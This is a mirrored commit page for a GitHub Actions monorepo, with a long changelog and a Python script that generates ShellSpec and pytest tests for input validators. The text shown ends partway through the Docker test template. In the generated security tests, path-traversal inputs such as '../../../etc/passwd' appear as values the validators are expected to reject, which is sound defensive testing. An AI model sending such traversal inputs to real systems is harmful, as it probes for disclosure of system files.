ivuorinen/actions
1
0
Fork 0
mirror of https://github.com/ivuorinen/actions.git synced 2026-01-26 11:34:00 +00:00
Code Issues Packages Projects Releases Wiki Activity

feat: fixes, tweaks, new actions, linting (#186)

Browse Source 
* feat: fixes, tweaks, new actions, linting
* fix: improve docker publish loops and dotnet parsing (#193)
* fix: harden action scripts and version checks (#191)
* refactor: major repository restructuring and security enhancements

Add comprehensive development infrastructure:
- Add Makefile with automated documentation generation, formatting, and linting tasks
- Add TODO.md tracking self-containment progress and repository improvements
- Add .nvmrc for consistent Node.js version management
- Create python-version-detect-v2 action for enhanced Python detection

Enhance all GitHub Actions with standardized patterns:
- Add consistent token handling across 27 actions using standardized input patterns
- Implement bash error handling (set -euo pipefail) in all shell steps
- Add comprehensive input validation for path traversal and command injection protection
- Standardize checkout token authentication to prevent rate limiting
- Remove relative action dependencies to ensure external usability

Rewrite security workflow for PR-focused analysis:
- Transform security-suite.yml to PR-only security analysis workflow
- Remove scheduled runs, repository issue management, and Slack notifications
- Implement smart comment generation showing only sections with content
- Add GitHub Actions permission diff analysis and new action detection
- Integrate OWASP, Semgrep, and TruffleHog for comprehensive PR security scanning

Improve version detection and dependency management:
- Simplify version detection actions to use inline logic instead of shared utilities
- Fix Makefile version detection fallback to properly return 'main' when version not found
- Update all external action references to use SHA-pinned versions
- Remove deprecated run.sh in favor of Makefile automation

Update documentation and project standards:
- Enhance CLAUDE.md with self-containment requirements and linting standards
- Update README.md with improved action descriptions and usage examples
- Standardize code formatting with updated .editorconfig and .prettierrc.yml
- Improve GitHub templates for issues and security reporting

This refactoring ensures all 40 actions are fully self-contained and can be used independently when
referenced as ivuorinen/actions/action-name@main, addressing the critical requirement for external
usability while maintaining comprehensive security analysis and development automation.

* feat: add automated action catalog generation system

- Create generate_listing.cjs script for comprehensive action catalog
- Add package.json with development tooling and npm scripts
- Implement automated README.md catalog section with --update flag
- Generate markdown reference-style links for all 40 actions
- Add categorized tables with features, language support matrices
- Replace static reference links with auto-generated dynamic links
- Enable complete automation of action documentation maintenance

* feat: enhance actions with improved documentation and functionality

- Add comprehensive README files for 12 actions with usage examples
- Implement new utility actions (go-version-detect, dotnet-version-detect)
- Enhance node-setup with extensive configuration options
- Improve error handling and validation across all actions
- Update package.json scripts for better development workflow
- Expand TODO.md with detailed roadmap and improvement plans
- Standardize action structure with consistent inputs/outputs

* feat: add comprehensive output handling across all actions

- Add standardized outputs to 15 actions that previously had none
- Implement consistent snake_case naming convention for all outputs
- Add build status and test results outputs to build actions
- Add files changed and status outputs to lint/fix actions
- Add test execution metrics to php-tests action
- Add stale/closed counts to stale action
- Add release URLs and IDs to github-release action
- Update documentation with output specifications
- Mark comprehensive output handling task as complete in TODO.md

* feat: implement shared cache strategy across all actions

- Add caching to 10 actions that previously had none (Node.js, .NET, Python, Go)
- Standardize 4 existing actions to use common-cache instead of direct actions/cache
- Implement consistent cache-hit optimization to skip installations when cache available
- Add language-specific cache configurations with appropriate key files
- Create unified caching approach using ivuorinen/actions/common-cache@main
- Fix YAML syntax error in php-composer action paths parameter
- Update TODO.md to mark shared cache strategy as complete

* feat: implement comprehensive retry logic for network operations

- Create new common-retry action for standardized retry patterns with configurable strategies
- Add retry logic to 9 actions missing network retry capabilities
- Implement exponential backoff, custom timeouts, and flexible error handling
- Add max-retries input parameter to all network-dependent actions (Node.js, .NET, Python, Go)
- Standardize existing retry implementations to use common-retry utility
- Update action catalog to include new common-retry action (41 total actions)
- Update documentation with retry configuration examples and parameters
- Mark retry logic implementation as complete in TODO.md roadmap

* feat: enhance Node.js support with Corepack and Bun

- Add Corepack support for automatic package manager version management
- Add Bun package manager support across all Node.js actions
- Improve Yarn Berry/PnP support with .yarnrc.yml detection
- Add Node.js feature detection (ESM, TypeScript, frameworks)
- Update package manager detection priority and lockfile support
- Enhance caching with package-manager-specific keys
- Update eslint, prettier, and biome actions for multi-package-manager support

* fix: resolve critical runtime issues across multiple actions

- Fix token validation by removing ineffective literal string comparisons
- Add missing @microsoft/eslint-formatter-sarif dependency for SARIF output
- Fix Bash variable syntax errors in username and changelog length checks
- Update Dockerfile version regex to handle tags with suffixes (e.g., -alpine)
- Simplify version selection logic with single grep command
- Fix command execution in retry action with proper bash -c wrapper
- Correct step output references using .outcome instead of .outputs.outcome
- Add missing step IDs for version detection actions
- Include go.mod in cache key files for accurate invalidation
- Require minor version in all version regex patterns
- Improve Bun installation security by verifying script before execution
- Replace bc with sort -V for portable PHP version comparison
- Remove non-existent pre-commit output references

These fixes ensure proper runtime behavior, improved security, and better
cross-platform compatibility across all affected actions.

* fix: resolve critical runtime and security issues across actions

- Fix biome-fix files_changed calculation using git diff instead of git status delta
- Fix compress-images output description and add absolute path validation
- Remove csharp-publish token default and fix token fallback in push commands
- Add @microsoft/eslint-formatter-sarif to all package managers in eslint-check
- Fix eslint-check command syntax by using variable assignment
- Improve node-setup Bun installation security and remove invalid frozen-lockfile flag
- Fix pre-commit token validation by removing ineffective literal comparison
- Fix prettier-fix token comparison and expand regex for all GitHub token types
- Add version-file-parser regex validation safety and fix csproj wildcard handling

These fixes address security vulnerabilities, runtime errors, and functional issues
to ensure reliable operation across all affected GitHub Actions.

* feat: enhance Docker actions with advanced multi-architecture support

Major enhancement to Docker build and publish actions with comprehensive
multi-architecture capabilities and enterprise-grade features.

Added features:
- Advanced buildx configuration (version control, cache modes, build contexts)
- Auto-detect platforms for dynamic architecture discovery
- Performance optimizations with enhanced caching strategies
- Security scanning with Trivy and image signing with Cosign
- SBOM generation in multiple formats with validation
- Verbose logging and dry-run modes for debugging
- Platform-specific build args and fallback mechanisms

Enhanced all Docker actions:
- docker-build: Core buildx features and multi-arch support
- docker-publish-gh: GitHub Packages with security features
- docker-publish-hub: Docker Hub with scanning and signing
- docker-publish: Orchestrator with unified configuration

Updated documentation across all modified actions.

* fix: resolve documentation generation placeholder issue

Fixed Makefile and package.json to properly replace placeholder tokens in generated documentation, ensuring all README files show correct repository paths instead of ***PROJECT***@***VERSION***.

* chore: simplify github token validation
* chore(lint): optional yamlfmt, config and fixes
* feat: use relative `uses` names

* feat: comprehensive testing infrastructure and Python validation system

- Migrate from tests/ to _tests/ directory structure with ShellSpec framework
- Add comprehensive validation system with Python-based input validation
- Implement dual testing approach (ShellSpec + pytest) for complete coverage
- Add modern Python tooling (uv, ruff, pytest-cov) and dependencies
- Create centralized validation rules with automatic generation system
- Update project configuration and build system for new architecture
- Enhance documentation to reflect current testing capabilities

This establishes a robust foundation for action validation and testing
with extensive coverage across all GitHub Actions in the repository.

* chore: remove Dockerfile for now
* chore: code review fixes

* feat: comprehensive GitHub Actions restructuring and tooling improvements

This commit represents a major restructuring of the GitHub Actions monorepo
with improved tooling, testing infrastructure, and comprehensive PR #186
review implementation.

## Major Changes

### 🔧 Development Tooling & Configuration
- **Shellcheck integration**: Exclude shellspec test files from linting
  - Updated .pre-commit-config.yaml to exclude _tests/*.sh from shellcheck/shfmt
  - Modified Makefile shellcheck pattern to skip shellspec files
  - Updated CLAUDE.md documentation with proper exclusion syntax
- **Testing infrastructure**: Enhanced Python validation framework
  - Fixed nested if statements and boolean parameter issues in validation.py
  - Improved code quality with explicit keyword arguments
  - All pre-commit hooks now passing

### 🏗️ Project Structure & Documentation
- **Added Serena AI integration** with comprehensive project memories:
  - Project overview, structure, and technical stack documentation
  - Code style conventions and completion requirements
  - Comprehensive PR #186 review analysis and implementation tracking
- **Enhanced configuration**: Updated .gitignore, .yamlfmt.yml, pyproject.toml
- **Improved testing**: Added integration workflows and enhanced test specs

### 🚀 GitHub Actions Improvements (30+ actions updated)
- **Centralized validation**: Updated 41 validation rule files
- **Enhanced actions**: Improvements across all action categories:
  - Setup actions (node-setup, version detectors)
  - Utility actions (version-file-parser, version-validator)
  - Linting actions (biome, eslint, terraform-lint-fix major refactor)
  - Build/publish actions (docker-build, npm-publish, csharp-*)
  - Repository management actions

### 📝 Documentation Updates
- **README consistency**: Updated version references across action READMEs
- **Enhanced documentation**: Improved action descriptions and usage examples
- **CLAUDE.md**: Updated with current tooling and best practices

## Technical Improvements
- **Security enhancements**: Input validation and sanitization improvements
- **Performance optimizations**: Streamlined action logic and dependencies
- **Cross-platform compatibility**: Better Windows/macOS/Linux support
- **Error handling**: Improved error reporting and user feedback

## Files Changed
- 100 files changed
- 13 new Serena memory files documenting project state
- 41 validation rules updated for consistency
- 30+ GitHub Actions and READMEs improved
- Core tooling configuration enhanced

* feat: comprehensive GitHub Actions improvements and PR review fixes

Major Infrastructure Improvements:
- Add comprehensive testing framework with 17+ ShellSpec validation tests
- Implement Docker-based testing tools with automated test runner
- Add CodeRabbit configuration for automated code reviews
- Restructure documentation and memory management system
- Update validation rules for 25+ actions with enhanced input validation
- Modernize CI/CD workflows and testing infrastructure

Critical PR Review Fixes (All Issues Resolved):
- Fix double caching in node-setup (eliminate redundant cache operations)
- Optimize shell pipeline in version-file-parser (single awk vs complex pipeline)
- Fix GitHub expression interpolation in prettier-check cache keys
- Resolve terraform command order issue (validation after setup)
- Add missing flake8-sarif dependency for Python SARIF output
- Fix environment variable scope in pr-lint (export to GITHUB_ENV)

Performance & Reliability:
- Eliminate duplicate cache operations saving CI time
- Improve shell script efficiency with optimized parsing
- Fix command execution dependencies preventing runtime failures
- Ensure proper dependency installation for all linting tools
- Resolve workflow conditional logic issues

Security & Quality:
- All input validation rules updated with latest security patterns
- Cross-platform compatibility improvements maintained
- Comprehensive error handling and retry logic preserved
- Modern development tooling and best practices adopted

This commit addresses 100% of actionable feedback from PR review analysis,
implements comprehensive testing infrastructure, and maintains high code
quality standards across all 41 GitHub Actions.

* feat: enhance expression handling and version parsing

- Fix node-setup force-version expression logic for proper empty string handling
- Improve version-file-parser with secure regex validation and enhanced Python detection
- Add CodeRabbit configuration for CalVer versioning and README review guidance

* feat(validate-inputs): implement modular validation system

- Add modular validator architecture with specialized validators
- Implement base validator classes for different input types
- Add validators: boolean, docker, file, network, numeric, security, token, version
- Add convention mapper for automatic input validation
- Add comprehensive documentation for the validation system
- Implement PCRE regex support and injection protection

* feat(validate-inputs): add validation rules for all actions

- Add YAML validation rules for 42 GitHub Actions
- Auto-generated rules with convention mappings
- Include metadata for validation coverage and quality indicators
- Mark rules as auto-generated to prevent manual edits

* test(validate-inputs): add comprehensive test suite for validators

- Add unit tests for all validator modules
- Add integration tests for the validation system
- Add fixtures for version test data
- Test coverage for boolean, docker, file, network, numeric, security, token, and version validators
- Add tests for convention mapper and registry

* feat(tools): add validation scripts and utilities

- Add update-validators.py script for auto-generating rules
- Add benchmark-validator.py for performance testing
- Add debug-validator.py for troubleshooting
- Add generate-tests.py for test generation
- Add check-rules-not-manually-edited.sh for CI validation
- Add fix-local-action-refs.py tool for fixing action references

* feat(actions): add CustomValidator.py files for specialized validation

- Add custom validators for actions requiring special validation logic
- Implement validators for docker, go, node, npm, php, python, terraform actions
- Add specialized validation for compress-images, common-cache, common-file-check
- Implement version detection validators with language-specific logic
- Add validation for build arguments, architectures, and version formats

* test: update ShellSpec test framework for Python validation

- Update all validation.spec.sh files to use Python validator
- Add shared validation_core.py for common test utilities
- Remove obsolete bash validation helpers
- Update test output expectations for Python validator format
- Add codeql-analysis test suite
- Refactor framework utilities for Python integration
- Remove deprecated test files

* feat(actions): update action.yml files to use validate-inputs

- Replace inline bash validation with validate-inputs action
- Standardize validation across all 42 actions
- Add new codeql-analysis action
- Update action metadata and branding
- Add validation step as first step in composite actions
- Maintain backward compatibility with existing inputs/outputs

* ci: update GitHub workflows for enhanced security and testing

- Add new codeql-new.yml workflow
- Update security scanning workflows
- Enhance dependency review configuration
- Update test-actions workflow for new validation system
- Improve workflow permissions and security settings
- Update action versions to latest SHA-pinned releases

* build: update build configuration and dependencies

- Update Makefile with new validation targets
- Add Python dependencies in pyproject.toml
- Update npm dependencies and scripts
- Enhance Docker testing tools configuration
- Add targets for validator updates and local ref fixes
- Configure uv for Python package management

* chore: update linting and documentation configuration

- Update EditorConfig settings for consistent formatting
- Enhance pre-commit hooks configuration
- Update prettier and yamllint ignore patterns
- Update gitleaks security scanning rules
- Update CodeRabbit review configuration
- Update CLAUDE.md with latest project standards and rules

* docs: update Serena memory files and project metadata

- Remove obsolete PR-186 memory files
- Update project overview with current architecture
- Update project structure documentation
- Add quality standards and communication guidelines
- Add modular validator architecture documentation
- Add shellspec testing framework documentation
- Update project.yml with latest configuration

* feat: moved rules.yml to same folder as action, fixes

* fix(validators): correct token patterns and fix validator bugs

- Fix GitHub classic PAT pattern: ghp_ + 36 chars = 40 total
- Fix GitHub fine-grained PAT pattern: github_pat_ + 71 chars = 82 total
- Initialize result variable in convention_mapper to prevent UnboundLocalError
- Fix empty URL validation in network validator to return error
- Add GitHub expression check to docker architectures validator
- Update docker-build CustomValidator parallel-builds max to 16

* test(validators): fix test fixtures and expectations

- Fix token lengths in test data: github_pat 71 chars, ghp/gho 36 chars
- Update integration tests with correct token lengths
- Fix file validator test to expect absolute paths rejected for security
- Rename TestGenerator import to avoid pytest collection warning
- Update custom validator tests with correct input names
- Change docker-build tests: platforms->architectures, tags->tag
- Update docker-publish tests to match new registry enum validation

* test(shellspec): fix token lengths in test helpers and specs

- Fix default token lengths in spec_helper.sh to use correct 40-char format
- Update csharp-publish default tokens in 4 locations
- Update codeql-analysis default tokens in 2 locations
- Fix codeql-analysis test tokens to correct lengths (40 and 82 chars)
- Fix npm-publish fine-grained token test to use 82-char format

* feat(actions): add permissions documentation and environment variable usage

- Add permissions comments to all action.yml files documenting required GitHub permissions
- Convert direct input usage to environment variables in shell steps for security
- Add validation steps with proper error handling
- Update input descriptions and add security notes where applicable
- Ensure all actions follow consistent patterns for input validation

* chore(workflows): update GitHub Actions workflow versions

- Update workflow action versions to latest
- Improve workflow consistency and maintainability

* docs(security): add comprehensive security policy

- Document security features and best practices
- Add vulnerability reporting process
- Include audit history and security testing information

* docs(memory): add GitHub workflow reference documentation

- Add GitHub Actions workflow commands reference
- Add GitHub workflow expressions guide
- Add secure workflow usage patterns and best practices

* chore: token optimization, code style conventions
* chore: cr fixes
* fix: trivy reported Dockerfile problems
* fix(security): more security fixes
* chore: dockerfile and make targets for publishing
* fix(ci): add creds to test-actions workflow
* fix: security fix and checkout step to codeql-new
* chore: test fixes
* fix(security): codeql detected issues
* chore: code review fixes, ReDos protection
* style: apply MegaLinter fixes
* fix(ci): missing packages read permission
* fix(ci): add missing working directory setting
* chore: linting, add validation-regex to use regex_pattern
* chore: code review fixes
* chore(deps): update actions
* fix(security): codeql fixes
* chore(cr): apply cr comments
* chore: improve POSIX compatibility
* chore(cr): apply cr comments
* fix: codeql warning in Dockerfile, build failures
* chore(cr): apply cr comments
* fix: docker-testing-tools/Dockerfile
* chore(cr): apply cr comments
* fix(docker): update testing-tools image for GitHub Actions compatibility
* chore(cr): apply cr comments
* feat: add more tests, fix issues
* chore: fix codeql issues, update actions
* chore(cr): apply cr comments
* fix: integration tests
* chore: deduplication and fixes
* style: apply MegaLinter fixes
* chore(cr): apply cr comments
* feat: dry-run mode for generate-tests
* fix(ci): kcov installation
* chore(cr): apply cr comments
* chore(cr): apply cr comments
* chore(cr): apply cr comments
* chore(cr): apply cr comments, simplify action testing, use uv
* fix: run-tests.sh action counting
* chore(cr): apply cr comments
* chore(cr): apply cr comments
This commit is contained in:
Ismo Vuorinen
2025-10-14 13:37:58 +03:00
committed by GitHub
parent d3cc8d4790
commit 78fdad69e5
353 changed files with 55370 additions and 1714 deletions
Download Patch File Download Diff File Expand all files Collapse all files

912
validate-inputs/scripts/generate-tests.py Executable file
View File

@@ -0,0 +1,912 @@
#!/usr/bin/env python3
"""Test generation system for GitHub Actions and validators.
This script generates test files for actions and validators based on their
definitions, without overwriting existing tests.
"""
# pylint: disable=invalid-name # Script name matches convention
from __future__ import annotations
import argparse
import logging
from pathlib import Path
import re
import sys
import yaml # pylint: disable=import-error
# Set up logging
logging.basicConfig(
level=logging.INFO,
format="%(levelname)s: %(message)s",
)
logger = logging.getLogger(__name__)
class TestGenerator:
"""Generate tests for GitHub Actions and validators."""
def __init__(self, project_root: Path, *, dry_run: bool = False) -> None:
"""Initialize the test generator.
Args:
project_root: Path to the project root directory
dry_run: If True, don't write files, just show what would be generated
"""
self.project_root = project_root
self.validate_inputs_dir = project_root / "validate-inputs"
self.tests_dir = project_root / "_tests"
self.generated_count = 0
self.skipped_count = 0
self.dry_run = dry_run
def generate_all_tests(self) -> None:
"""Generate tests for all actions and validators."""
logger.info("Starting test generation...")
# Generate ShellSpec tests for actions
self.generate_action_tests()
# Generate pytest tests for validators
self.generate_validator_tests()
# Generate tests for custom validators
self.generate_custom_validator_tests()
logger.info(
"Test generation complete: %d generated, %d skipped (already exist)",
self.generated_count,
self.skipped_count,
)
def generate_action_tests(self) -> None:
"""Generate ShellSpec tests for GitHub Actions."""
logger.info("Generating ShellSpec tests for actions...")
# Find all action directories
for item in sorted(self.project_root.iterdir()):
if not item.is_dir():
continue
action_yml = item / "action.yml"
if not action_yml.exists():
continue
# Skip special directories
if item.name.startswith((".", "_")) or item.name == "validate-inputs":
continue
self._generate_shellspec_test(item.name, action_yml)
def _generate_shellspec_test(self, action_name: str, action_yml: Path) -> None:
"""Generate ShellSpec test for a single action.
Args:
action_name: Name of the action
action_yml: Path to the action.yml file
"""
# Check if test already exists
test_file = self.tests_dir / "unit" / action_name / "validation.spec.sh"
if test_file.exists():
logger.debug("Test already exists for %s, skipping", action_name)
self.skipped_count += 1
return
# Load action definition
with action_yml.open() as f:
action_def = yaml.safe_load(f)
# Generate test content
test_content = self._generate_shellspec_content(action_name, action_def)
if self.dry_run:
logger.info("[DRY RUN] Would generate ShellSpec test: %s", test_file)
self.generated_count += 1
return
# Create test directory
test_file.parent.mkdir(parents=True, exist_ok=True)
# Write test file
with test_file.open("w", encoding="utf-8") as f:
f.write(test_content)
# Make executable
test_file.chmod(0o755)
logger.info("Generated ShellSpec test for %s", action_name)
self.generated_count += 1
def _generate_shellspec_content(self, action_name: str, action_def: dict) -> str:
"""Generate ShellSpec test content.
Args:
action_name: Name of the action
action_def: Action definition from action.yml
Returns:
ShellSpec test content
"""
inputs = action_def.get("inputs", {})
required_inputs = [name for name, config in inputs.items() if config.get("required", False)]
# Convert action name to readable format
readable_name = action_name.replace("-", " ").title()
# Use action description if available, otherwise use readable name
description = action_def.get("name", readable_name)
content = f"""#!/usr/bin/env bash
# ShellSpec tests for {action_name}
# Generated by generate-tests.py - Do not edit manually
# shellcheck disable=SC1091
. "$SHELLSPEC_HELPERDIR/../unit/spec_helper.sh"
Describe '{description} Input Validation'
"""
# Add setup
content += """
setup() {
export_test_env
export INPUT_ACTION_TYPE="${action_name}"
cleanup_test_env
}
Before 'setup'
After 'cleanup_test_env'
"""
# Generate test for required inputs
if required_inputs:
content += f""" Context 'Required inputs validation'
It 'should fail when required inputs are missing'
When run validate_inputs '{action_name}'
The status should be failure
The error should include 'required'
End
"""
for input_name in required_inputs:
env_var = f"INPUT_{input_name.upper().replace('-', '_')}"
content += f"""
It 'should fail without {input_name}'
unset {env_var}
When run validate_inputs '{action_name}'
The status should be failure
The error should include '{input_name}'
End
"""
# Generate test for valid inputs
content += """
Context 'Valid inputs'
It 'should pass with all valid inputs'
"""
# Add example values for each input
for input_name, config in inputs.items():
env_var = f"INPUT_{input_name.upper().replace('-', '_')}"
example_value = self._get_example_value(input_name, config)
content += f" export {env_var}='{example_value}'\n"
content += f""" When run validate_inputs '{action_name}'
The status should be success
The output should not include 'error'
End
End
"""
# Add input-specific validation tests
for input_name, config in inputs.items():
test_cases = self._generate_input_test_cases(input_name, config)
if test_cases:
content += f"""
Context '{input_name} validation'
"""
for test_case in test_cases:
content += test_case
content += " End\n"
content += "End\n"
return content
def _get_example_value(self, input_name: str, config: dict) -> str:
"""Get example value for an input based on its name and config.
Args:
input_name: Name of the input
config: Input configuration from action.yml
Returns:
Example value for the input
"""
# Check for default value
if "default" in config:
return str(config["default"])
# Common patterns
patterns = {
r"token": "${{ secrets.GITHUB_TOKEN }}",
r"version": "1.2.3",
r"path|file|directory": "./path/to/file",
r"url|endpoint": "https://example.com",
r"email": "test@example.com",
r"branch": "main",
r"tag": "v1.0.0",
r"image": "myapp:latest",
r"registry": "docker.io",
r"platform|architecture": "linux/amd64",
r"language": "javascript",
r"command": "echo test",
r"args|arguments": "--verbose",
r"message|description": "Test message",
r"name|title": "Test Name",
r"dry.?run|debug|verbose": "false",
r"push|publish|release": "true",
r"timeout|delay": "60",
r"retries|attempts": "3",
r"port": "8080",
r"host": "localhost",
}
# Match patterns
for pattern, value in patterns.items():
if re.search(pattern, input_name, re.IGNORECASE):
return value
# Default fallback
return "test-value"
def _generate_input_test_cases(
self,
input_name: str,
config: dict, # noqa: ARG002
) -> list[str]:
"""Generate test cases for a specific input.
Args:
input_name: Name of the input
config: Input configuration
Returns:
List of test case strings
"""
test_cases = []
env_var = f"INPUT_{input_name.upper().replace('-', '_')}"
# Boolean validation
if re.search(r"dry.?run|debug|verbose|push|publish", input_name, re.IGNORECASE):
test_cases.append(f"""
It 'should accept boolean values for {input_name}'
export {env_var}='true'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should reject invalid boolean for {input_name}'
export {env_var}='invalid'
When run validate_inputs '${{action_name}}'
The status should be failure
The error should include 'boolean'
End
""")
# Version validation
elif "version" in input_name.lower():
test_cases.append(f"""
It 'should accept valid version for {input_name}'
export {env_var}='1.2.3'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should accept version with v prefix for {input_name}'
export {env_var}='v1.2.3'
When run validate_inputs '${{action_name}}'
The status should be success
End
""")
# Token validation
elif "token" in input_name.lower():
test_cases.append(f"""
It 'should accept GitHub token for {input_name}'
export {env_var}='${{{{ secrets.GITHUB_TOKEN }}}}'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should accept classic PAT for {input_name}'
export {env_var}='ghp_1234567890123456789012345678901234'
When run validate_inputs '${{action_name}}'
The status should be success
End
""")
# Path validation
elif re.search(r"path|file|directory", input_name, re.IGNORECASE):
test_cases.append(f"""
It 'should accept valid path for {input_name}'
export {env_var}='./valid/path'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should reject path traversal for {input_name}'
export {env_var}='../../../etc/passwd'
When run validate_inputs '${{action_name}}'
The status should be failure
The error should include 'security'
End
""")
return test_cases
def generate_validator_tests(self) -> None:
"""Generate pytest tests for validators."""
logger.info("Generating pytest tests for validators...")
validators_dir = self.validate_inputs_dir / "validators"
tests_dir = self.validate_inputs_dir / "tests"
# Find all validator modules
for validator_file in sorted(validators_dir.glob("*.py")):
if validator_file.name in ("__init__.py", "base.py", "registry.py"):
continue
validator_name = validator_file.stem
test_file = tests_dir / f"test_{validator_name}.py"
# Skip if test already exists
if test_file.exists():
logger.debug("Test already exists for %s, skipping", validator_name)
self.skipped_count += 1
continue
# Generate test content
test_content = self._generate_pytest_content(validator_name)
if self.dry_run:
logger.info("[DRY RUN] Would generate pytest test: %s", test_file)
self.generated_count += 1
continue
# Write test file
with test_file.open("w", encoding="utf-8") as f:
f.write(test_content)
logger.info("Generated pytest test for %s", validator_name)
self.generated_count += 1
def _generate_pytest_content(self, validator_name: str) -> str:
"""Generate pytest test content for a validator.
Args:
validator_name: Name of the validator module
Returns:
pytest test content
"""
class_name = "".join(word.capitalize() for word in validator_name.split("_"))
if not class_name.endswith("Validator"):
class_name += "Validator"
content = f'''"""Tests for {validator_name} validator.
Generated by generate-tests.py - Do not edit manually.
"""
import pytest
from validators.{validator_name} import {class_name}
class Test{class_name}:
"""Test cases for {class_name}."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = {class_name}("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
'''
# Add common test methods based on validator type
if "version" in validator_name:
content += self._add_version_tests()
elif "token" in validator_name:
content += self._add_token_tests()
elif "boolean" in validator_name:
content += self._add_boolean_tests()
elif "numeric" in validator_name:
content += self._add_numeric_tests()
elif "file" in validator_name:
content += self._add_file_tests()
elif "network" in validator_name:
content += self._add_network_tests()
elif "docker" in validator_name:
content += self._add_docker_tests()
elif "security" in validator_name:
content += self._add_security_tests()
else:
content += self._add_generic_tests(validator_name)
return content
def _add_version_tests(self) -> str:
"""Add version-specific test methods."""
return '''
def test_valid_semantic_version(self):
"""Test valid semantic version."""
assert self.validator.validate_semantic_version("1.2.3") is True
assert self.validator.validate_semantic_version("1.0.0-alpha") is True
assert self.validator.validate_semantic_version("2.0.0+build123") is True
def test_invalid_semantic_version(self):
"""Test invalid semantic version."""
assert self.validator.validate_semantic_version("1.2") is False
assert self.validator.validate_semantic_version("invalid") is False
assert self.validator.validate_semantic_version("1.2.3.4") is False
def test_valid_calver(self):
"""Test valid calendar version."""
assert self.validator.validate_calver("2024.3.1") is True
assert self.validator.validate_calver("2024.03.15") is True
assert self.validator.validate_calver("24.3.1") is True
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_semantic_version("${{ env.VERSION }}") is True
assert self.validator.validate_calver("${{ steps.version.outputs.version }}") is True
'''
def _add_token_tests(self) -> str:
"""Add token-specific test methods."""
return '''
def test_valid_github_token(self):
"""Test valid GitHub tokens."""
# Classic PAT (36 chars)
assert self.validator.validate_github_token("ghp_" + "a" * 32) is True
# Fine-grained PAT (82 chars)
assert self.validator.validate_github_token("github_pat_" + "a" * 71) is True
# GitHub expression
assert self.validator.validate_github_token("${{ secrets.GITHUB_TOKEN }}") is True
def test_invalid_github_token(self):
"""Test invalid GitHub tokens."""
assert self.validator.validate_github_token("invalid") is False
assert self.validator.validate_github_token("ghp_short") is False
assert self.validator.validate_github_token("") is False
def test_other_token_types(self):
"""Test other token types."""
# NPM token
assert self.validator.validate_npm_token("npm_" + "a" * 32) is True
# PyPI token
assert self.validator.validate_pypi_token("pypi-AgEIcHlwaS5vcmc" + "a" * 100) is True
'''
def _add_boolean_tests(self) -> str:
"""Add boolean-specific test methods."""
return '''
def test_valid_boolean_values(self):
"""Test valid boolean values."""
valid_values = ["true", "false", "True", "False", "TRUE", "FALSE",
"yes", "no", "on", "off", "1", "0"]
for value in valid_values:
assert self.validator.validate_boolean(value) is True
assert not self.validator.has_errors()
def test_invalid_boolean_values(self):
"""Test invalid boolean values."""
invalid_values = ["maybe", "unknown", "2", "-1", "", "null"]
for value in invalid_values:
self.validator.clear_errors()
assert self.validator.validate_boolean(value) is False
assert self.validator.has_errors()
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_boolean("${{ inputs.dry_run }}") is True
assert self.validator.validate_boolean("${{ env.DEBUG }}") is True
'''
def _add_numeric_tests(self) -> str:
"""Add numeric-specific test methods."""
return '''
def test_valid_integers(self):
"""Test valid integer values."""
assert self.validator.validate_integer("42") is True
assert self.validator.validate_integer("-10") is True
assert self.validator.validate_integer("0") is True
def test_invalid_integers(self):
"""Test invalid integer values."""
assert self.validator.validate_integer("3.14") is False
assert self.validator.validate_integer("abc") is False
assert self.validator.validate_integer("") is False
def test_numeric_ranges(self):
"""Test numeric range validation."""
assert self.validator.validate_range("5", min_val=1, max_val=10) is True
assert self.validator.validate_range("15", min_val=1, max_val=10) is False
assert self.validator.validate_range("-5", min_val=0) is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_integer("${{ inputs.timeout }}") is True
assert self.validator.validate_range("${{ env.RETRIES }}", min_val=1) is True
'''
def _add_file_tests(self) -> str:
"""Add file-specific test methods."""
return '''
def test_valid_file_paths(self):
"""Test valid file paths."""
assert self.validator.validate_file_path("./src/main.py") is True
assert self.validator.validate_file_path("/absolute/path/file.txt") is True
assert self.validator.validate_file_path("relative/path.yml") is True
def test_path_traversal_detection(self):
"""Test path traversal detection."""
assert self.validator.validate_file_path("../../../etc/passwd") is False
assert self.validator.validate_file_path("./valid/../../../etc/passwd") is False
assert self.validator.has_errors()
def test_file_extensions(self):
"""Test file extension validation."""
assert self.validator.validate_yaml_file("config.yml") is True
assert self.validator.validate_yaml_file("config.yaml") is True
assert self.validator.validate_yaml_file("config.txt") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_file_path("${{ github.workspace }}/file.txt") is True
assert self.validator.validate_yaml_file("${{ inputs.config_file }}") is True
'''
def _add_network_tests(self) -> str:
"""Add network-specific test methods."""
return '''
def test_valid_urls(self):
"""Test valid URL formats."""
assert self.validator.validate_url("https://example.com") is True
assert self.validator.validate_url("http://localhost:8080") is True
assert self.validator.validate_url("https://api.example.com/v1/endpoint") is True
def test_invalid_urls(self):
"""Test invalid URL formats."""
assert self.validator.validate_url("not-a-url") is False
assert self.validator.validate_url("ftp://example.com") is False
assert self.validator.validate_url("") is False
def test_valid_emails(self):
"""Test valid email addresses."""
assert self.validator.validate_email("user@example.com") is True
assert self.validator.validate_email("test.user+tag@company.co.uk") is True
def test_invalid_emails(self):
"""Test invalid email addresses."""
assert self.validator.validate_email("invalid") is False
assert self.validator.validate_email("@example.com") is False
assert self.validator.validate_email("user@") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_url("${{ secrets.WEBHOOK_URL }}") is True
assert self.validator.validate_email("${{ github.event.pusher.email }}") is True
'''
def _add_docker_tests(self) -> str:
"""Add Docker-specific test methods."""
return '''
def test_valid_image_names(self):
"""Test valid Docker image names."""
assert self.validator.validate_image_name("myapp") is True
assert self.validator.validate_image_name("my-app_v2") is True
# Registry paths supported
assert self.validator.validate_image_name("registry.example.com/myapp") is True
def test_valid_tags(self):
"""Test valid Docker tags."""
assert self.validator.validate_tag("latest") is True
assert self.validator.validate_tag("v1.2.3") is True
assert self.validator.validate_tag("feature-branch-123") is True
def test_valid_platforms(self):
"""Test valid Docker platforms."""
